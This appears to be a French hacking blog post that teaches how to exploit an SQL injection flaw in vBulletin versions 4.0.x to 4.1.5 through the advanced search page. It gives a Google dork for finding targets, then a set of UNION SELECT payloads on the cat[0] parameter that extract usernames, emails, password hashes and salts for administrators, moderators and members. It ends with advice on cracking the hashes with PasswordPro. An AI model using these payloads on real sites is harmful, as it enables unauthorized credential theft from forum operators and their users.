Post Populaire



Vidéo 1


Vidéo 2


je vous poste aujourd'hui la nouvelle faille découverte sur le puissant vBulletin.La vulnérabilité touche les versions 4.0.X jusqu'à la dernière : 4.1.5 (ce qui nous fait donc toutes les version 4 ^^'). dans le module de la recherche avancéel'exploitation de la faille ce fait grâce au cébèble plugin firefox (Live HTTP Headers)Google dork : inurl:”search.php?search_type=1?La faille nous permet d'avoir le username et le hash du mot de passe qu'on peux décrypter grâce au logiciel PasswordPro (Téléchargement IcI) en utilisant l’algorithme md5(md5($pass).$salt).


Requêtes utilisés pour l'extraction des idents :
Affiche le nom de la BDD :&cat[0]=1) UNION SELECT database()#
Affiche la liste des tables :&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
Affiche les informations du l'Administrateur suprême (User, passe hash, email, salt) :&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#
Affiche tout les admin :&cat[0]=1) union+select+group_concat(username,0x3a,password,0 x3a,salt) from user where usergroupid=6#
Affiche tout les super modo :&cat[0]=1) union+select+group_concat(username,0x3a,password,0 x3a,salt) from user where usergroupid=5#
Affiche tout les modos :&cat[0]=1) union+select+group_concat(username,0x3a,password,0 x3a,salt) from user where usergroupid=7#
Affiche les membres normaux :&cat[0]=1) union+select+group_concat(username,0x3a,password,0 x3a,salt) from user where usergroupid=2#
Tuto créer par The UnKnØwN

- sebdelkil 2009-2015 - Aucun droit réservé -